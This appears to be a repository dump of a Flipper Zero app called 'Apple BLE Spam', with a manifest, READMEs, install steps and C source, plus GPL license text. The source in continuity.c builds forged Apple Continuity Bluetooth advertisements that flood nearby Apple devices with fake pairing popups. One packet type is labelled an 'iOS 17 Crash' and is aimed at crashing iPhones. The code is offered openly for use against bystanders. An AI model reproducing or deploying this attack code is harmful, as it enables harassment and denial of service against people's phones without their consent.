├── .gitignore ├── apple_10px.png ├── icons ├── apple_10px.png ├── SmallArrowDown_3x5.png └── SmallArrowUp_3x5.png ├── .flipcorg └── gallery │ ├── 1.png │ ├── 2.png │ └── 3.png ├── .catalog ├── screenshots │ ├── 1.png │ ├── 2.png │ └── 3.png ├── CHANGELOG.md └── README.md ├── application.fam ├── README.md ├── lib └── continuity │ ├── continuity.h │ └── continuity.c ├── LICENSE └── apple_ble_spam.c /.gitignore: -------------------------------------------------------------------------------- 1 | dist/* 2 | .vscode 3 | .clang-format 4 | .editorconfig -------------------------------------------------------------------------------- /apple_10px.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noproto/apple_ble_spam_ofw/HEAD/apple_10px.png -------------------------------------------------------------------------------- /icons/apple_10px.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noproto/apple_ble_spam_ofw/HEAD/icons/apple_10px.png -------------------------------------------------------------------------------- /.flipcorg/gallery/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noproto/apple_ble_spam_ofw/HEAD/.flipcorg/gallery/1.png -------------------------------------------------------------------------------- /.flipcorg/gallery/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noproto/apple_ble_spam_ofw/HEAD/.flipcorg/gallery/2.png -------------------------------------------------------------------------------- /.flipcorg/gallery/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noproto/apple_ble_spam_ofw/HEAD/.flipcorg/gallery/3.png -------------------------------------------------------------------------------- /.catalog/screenshots/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noproto/apple_ble_spam_ofw/HEAD/.catalog/screenshots/1.png -------------------------------------------------------------------------------- /.catalog/screenshots/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noproto/apple_ble_spam_ofw/HEAD/.catalog/screenshots/2.png -------------------------------------------------------------------------------- /.catalog/screenshots/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noproto/apple_ble_spam_ofw/HEAD/.catalog/screenshots/3.png -------------------------------------------------------------------------------- /icons/SmallArrowDown_3x5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noproto/apple_ble_spam_ofw/HEAD/icons/SmallArrowDown_3x5.png -------------------------------------------------------------------------------- /icons/SmallArrowUp_3x5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noproto/apple_ble_spam_ofw/HEAD/icons/SmallArrowUp_3x5.png -------------------------------------------------------------------------------- /.catalog/CHANGELOG.md: -------------------------------------------------------------------------------- 1 | ## v 1.0 2 | 3 | - Backported to earlier firmware by searching memory for symbol, first release 4 | -------------------------------------------------------------------------------- /application.fam: -------------------------------------------------------------------------------- 1 | App( 2 | appid="apple_ble_spam", 3 | name="Apple BLE Spam", 4 | apptype=FlipperAppType.EXTERNAL, 5 | targets=["f7"], 6 | entry_point="apple_ble_spam", 7 | requires=["gui"], 8 | stack_size=5 * 1024, 9 | fap_icon="apple_10px.png", 10 | fap_category="Bluetooth", 11 | fap_icon_assets="icons", 12 | fap_private_libs=[ 13 | Lib( 14 | name="continuity", 15 | ), 16 | ], 17 | fap_author="@Willy-JL & @ECTO-1A", # Plus research from @ECTO-1A @xMasterX and @techryptic 18 | fap_version="1.2", 19 | fap_description="Spam Apple devices with annoying popups and notifications via BLE packets", 20 | ) 21 | -------------------------------------------------------------------------------- /.catalog/README.md: -------------------------------------------------------------------------------- 1 | # Apple BLE Spam 2 | 3 | This application spams Bluetooth broadcast packets to Apple devices, which may be up to 5 meters away. 4 | 5 | ## Usage 6 | 7 | Select the desired attack using left and right, the interval using up and down, and press the Start button to begin broadcasting. Press the Stop button to end broadcasting. 8 | 9 | ## Credits 10 | 11 | Original app by @WillyJL 12 | 13 | Extensive testing and research on behavior and parameters by @WillyJL and @ECTO-1A 14 | 15 | Structures docs and Nearby Action IDs from https://github.com/furiousMAC/continuity/ 16 | 17 | Proximity Pair IDs from https://github.com/ECTO-1A/AppleJuice/ 18 | 19 | Airtag ID from https://techryptic.github.io/2023/09/01/Annoying-Apple-Fans/ 20 | 21 | Ported/backported by @noproto 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Apple BLE Spam for OFW 2 | 3 | ![](https://thumb.tildacdn.com/tild3332-3839-4061-b663-363464303432/-/resize/214x/-/format/webp/noroot.png) 4 | 5 | ## What 6 | 7 | This Flipper application ("FAP") spams broadcast packets to Apple devices, which may be up to 5 meters away. 8 | 9 | More information: https://techryptic.github.io/2023/09/01/Annoying-Apple-Fans/ 10 | 11 | ## Builds 12 | 13 | OFW: App Hub PR conditionally rejected: https://github.com/flipperdevices/flipper-application-catalog/pull/149 14 | 15 | Published (options): 16 | * [FlipC.org](https://flipc.org/noproto/apple_ble_spam_ofw?branch=master) 17 | * Download the FAP at the above link then copy the FAP to its respective apps/ directory (Bluetooth) on your Flipper Zero device (using qFlipper or manually copying it to the SD) 18 | * [RogueMaster firmware](https://github.com/RogueMaster/flipperzero-firmware-wPlugins/releases/latest) 19 | * Built in to every release, you're good to go! 20 | 21 | ## Credit 22 | 23 | [Original app by WillyJL](https://github.com/Flipper-XFW/Xtreme-Firmware/tree/dev/applications/external/apple_ble_spam) 24 | 25 | Extensive testing and research on behavior and parameters by WillyJL and ECTO-1A 26 | 27 | Structures docs and Nearby Action IDs from https://github.com/furiousMAC/continuity/ 28 | 29 | Proximity Pair IDs from https://github.com/ECTO-1A/AppleJuice/ 30 | 31 | Airtag ID from https://techryptic.github.io/2023/09/01/Annoying-Apple-Fans/ 32 | -------------------------------------------------------------------------------- /lib/continuity/continuity.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | // Hacked together by @Willy-JL 7 | // Custom adv logic by @Willy-JL (idea by @xMasterX) 8 | // iOS 17 Crash by @ECTO-1A 9 | // Extensive testing and research on behavior and parameters by @Willy-JL and @ECTO-1A 10 | // Structures docs and Nearby Action IDs from https://github.com/furiousMAC/continuity/ 11 | // Proximity Pair IDs from https://github.com/ECTO-1A/AppleJuice/ 12 | // Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam 13 | 14 | typedef enum { 15 | ContinuityTypeAirDrop = 0x05, 16 | ContinuityTypeProximityPair = 0x07, 17 | ContinuityTypeAirplayTarget = 0x09, 18 | ContinuityTypeHandoff = 0x0C, 19 | ContinuityTypeTetheringSource = 0x0E, 20 | ContinuityTypeNearbyAction = 0x0F, 21 | ContinuityTypeNearbyInfo = 0x10, 22 | 23 | ContinuityTypeCustomCrash, 24 | ContinuityTypeCount 25 | } ContinuityType; 26 | 27 | typedef union { 28 | struct { 29 | } airdrop; 30 | struct { 31 | uint8_t prefix; 32 | uint16_t model; 33 | } proximity_pair; 34 | struct { 35 | } airplay_target; 36 | struct { 37 | } handoff; 38 | struct { 39 | } tethering_source; 40 | struct { 41 | uint8_t flags; 42 | uint8_t type; 43 | } nearby_action; 44 | struct { 45 | } nearby_info; 46 | struct { 47 | } custom_crash; 48 | } ContinuityData; 49 | 50 | typedef struct { 51 | ContinuityType type; 52 | ContinuityData data; 53 | } ContinuityMsg; 54 | 55 | const char* continuity_get_type_name(ContinuityType type); 56 | 57 | uint8_t continuity_get_packet_size(ContinuityType type); 58 | 59 | void continuity_generate_packet(const ContinuityMsg* msg, uint8_t* packet); 60 | -------------------------------------------------------------------------------- /lib/continuity/continuity.c: -------------------------------------------------------------------------------- 1 | #include "continuity.h" 2 | #include 3 | #include 4 | 5 | // Hacked together by @Willy-JL 6 | // Custom adv logic by @Willy-JL (idea by @xMasterX) 7 | // iOS 17 Crash by @ECTO-1A 8 | // Extensive testing and research on behavior and parameters by @Willy-JL and @ECTO-1A 9 | // Structures docs and Nearby Action IDs from https://github.com/furiousMAC/continuity/ 10 | // Proximity Pair IDs from https://github.com/ECTO-1A/AppleJuice/ 11 | // Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam 12 | 13 | static const char* continuity_type_names[ContinuityTypeCount] = { 14 | [ContinuityTypeAirDrop] = "AirDrop", 15 | [ContinuityTypeProximityPair] = "Proximity Pair", 16 | [ContinuityTypeAirplayTarget] = "Airplay Target", 17 | [ContinuityTypeHandoff] = "Handoff", 18 | [ContinuityTypeTetheringSource] = "Tethering Source", 19 | [ContinuityTypeNearbyAction] = "Nearby Action", 20 | [ContinuityTypeNearbyInfo] = "Nearby Info", 21 | [ContinuityTypeCustomCrash] = "Custom Packet", 22 | }; 23 | const char* continuity_get_type_name(ContinuityType type) { 24 | return continuity_type_names[type]; 25 | } 26 | 27 | #define HEADER_LEN (6) // 1 Length + 1 ? + 2 Company ID + 1 Continuity Type + 1 Continuity Length 28 | static uint8_t continuity_packet_sizes[ContinuityTypeCount] = { 29 | [ContinuityTypeAirDrop] = HEADER_LEN + 18, 30 | [ContinuityTypeProximityPair] = HEADER_LEN + 25, 31 | [ContinuityTypeAirplayTarget] = HEADER_LEN + 6, 32 | [ContinuityTypeHandoff] = HEADER_LEN + 14, 33 | [ContinuityTypeTetheringSource] = HEADER_LEN + 6, 34 | [ContinuityTypeNearbyAction] = HEADER_LEN + 5, 35 | [ContinuityTypeNearbyInfo] = HEADER_LEN + 5, 36 | [ContinuityTypeCustomCrash] = HEADER_LEN + 11, 37 | }; 38 | uint8_t continuity_get_packet_size(ContinuityType type) { 39 | return continuity_packet_sizes[type]; 40 | } 41 | 42 | void continuity_generate_packet(const ContinuityMsg* msg, uint8_t* packet) { 43 | uint8_t size = continuity_get_packet_size(msg->type); 44 | uint8_t i = 0; 45 | 46 | packet[i++] = size - 1; // Packet Length 47 | packet[i++] = 0xFF; // Packet Type (Manufacturer Specific) 48 | packet[i++] = 0x4C; // Packet Company ID (Apple, Inc.) 49 | packet[i++] = 0x00; // ... 50 | packet[i++] = msg->type; // Continuity Type 51 | packet[i] = size - i - 1; // Continuity Length 52 | i++; 53 | 54 | switch(msg->type) { 55 | case ContinuityTypeAirDrop: 56 | packet[i++] = 0x00; // Zeros 57 | packet[i++] = 0x00; // ... 58 | packet[i++] = 0x00; // ... 59 | packet[i++] = 0x00; // ... 60 | packet[i++] = 0x00; // ... 61 | packet[i++] = 0x00; // ... 62 | packet[i++] = 0x00; // ... 63 | packet[i++] = 0x00; // ... 64 | packet[i++] = 0x01; // Version 65 | packet[i++] = (rand() % 256); // AppleID 66 | packet[i++] = (rand() % 256); // ... 67 | packet[i++] = (rand() % 256); // Phone Number 68 | packet[i++] = (rand() % 256); // ... 69 | packet[i++] = (rand() % 256); // Email 70 | packet[i++] = (rand() % 256); // ... 71 | packet[i++] = (rand() % 256); // Email2 72 | packet[i++] = (rand() % 256); // ... 73 | packet[i++] = 0x00; // Zero 74 | break; 75 | 76 | case ContinuityTypeProximityPair: 77 | packet[i++] = msg->data.proximity_pair.prefix; // Prefix (paired 0x01 new 0x07 airtag 0x05) 78 | packet[i++] = msg->data.proximity_pair.model >> 8; 79 | packet[i++] = msg->data.proximity_pair.model & 0xFF; 80 | packet[i++] = 0x55; // Status 81 | packet[i++] = ((rand() % 10) << 4) + (rand() % 10); // Buds Battery Level 82 | packet[i++] = ((rand() % 8) << 4) + (rand() % 10); // Charing Status and Battery Case Level 83 | packet[i++] = (rand() % 256); // Lid Open Counter 84 | packet[i++] = 0x00; // Device Color 85 | packet[i++] = 0x00; 86 | furi_hal_random_fill_buf(&packet[i], 16); // Encrypted Payload 87 | i += 16; 88 | break; 89 | 90 | case ContinuityTypeAirplayTarget: 91 | packet[i++] = (rand() % 256); // Flags 92 | packet[i++] = (rand() % 256); // Configuration Seed 93 | packet[i++] = (rand() % 256); // IPv4 Address 94 | packet[i++] = (rand() % 256); // ... 95 | packet[i++] = (rand() % 256); // ... 96 | packet[i++] = (rand() % 256); // ... 97 | break; 98 | 99 | case ContinuityTypeHandoff: 100 | packet[i++] = 0x01; // Version 101 | packet[i++] = (rand() % 256); // Initialization Vector 102 | packet[i++] = (rand() % 256); // ... 103 | packet[i++] = (rand() % 256); // AES-GCM Auth Tag 104 | packet[i++] = (rand() % 256); // Encrypted Payload 105 | packet[i++] = (rand() % 256); // ... 106 | packet[i++] = (rand() % 256); // ... 107 | packet[i++] = (rand() % 256); // ... 108 | packet[i++] = (rand() % 256); // ... 109 | packet[i++] = (rand() % 256); // ... 110 | packet[i++] = (rand() % 256); // ... 111 | packet[i++] = (rand() % 256); // ... 112 | packet[i++] = (rand() % 256); // ... 113 | packet[i++] = (rand() % 256); // ... 114 | break; 115 | 116 | case ContinuityTypeTetheringSource: 117 | packet[i++] = 0x01; // Version 118 | packet[i++] = (rand() % 256); // Flags 119 | packet[i++] = (rand() % 101); // Battery Life 120 | packet[i++] = 0x00; // Cell Service Type 121 | packet[i++] = (rand() % 8); // ... 122 | packet[i++] = (rand() % 5); // Cell Service Strength 123 | break; 124 | 125 | case ContinuityTypeNearbyAction: 126 | packet[i] = msg->data.nearby_action.flags; // Action Flags 127 | if(packet[i] == 0xBF && rand() % 2) packet[i]++; // Ugly hack to shift 0xBF-0xC0 for spam 128 | i++; 129 | packet[i++] = msg->data.nearby_action.type; 130 | furi_hal_random_fill_buf(&packet[i], 3); // Authentication Tag 131 | i += 3; 132 | break; 133 | 134 | case ContinuityTypeNearbyInfo: 135 | packet[i++] = ((rand() % 16) << 4) + (rand() % 16); // Status Flags and Action Code 136 | packet[i++] = (rand() % 256); // Status Flags 137 | packet[i++] = (rand() % 256); // Authentication Tag 138 | packet[i++] = (rand() % 256); // ... 139 | packet[i++] = (rand() % 256); // ... 140 | break; 141 | 142 | case ContinuityTypeCustomCrash: 143 | // Found by @ECTO-1A 144 | 145 | i -= 2; // Override segment header 146 | packet[i++] = ContinuityTypeNearbyAction; // Type 147 | packet[i++] = 0x05; // Length 148 | packet[i++] = 0xC1; // Action Flags 149 | const uint8_t types[] = {0x27, 0x09, 0x02, 0x1e, 0x2b, 0x2d, 0x2f, 0x01, 0x06, 0x20, 0xc0}; 150 | packet[i++] = types[rand() % COUNT_OF(types)]; // Action Type 151 | furi_hal_random_fill_buf(&packet[i], 3); // Authentication Tag 152 | i += 3; 153 | 154 | packet[i++] = 0x00; // ??? 155 | packet[i++] = 0x00; // ??? 156 | 157 | packet[i++] = ContinuityTypeNearbyInfo; // Type ??? 158 | furi_hal_random_fill_buf(&packet[i], 3); // Shenanigans (Length + IDK) ??? 159 | i += 3; 160 | break; 161 | 162 | default: 163 | break; 164 | } 165 | } 166 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from 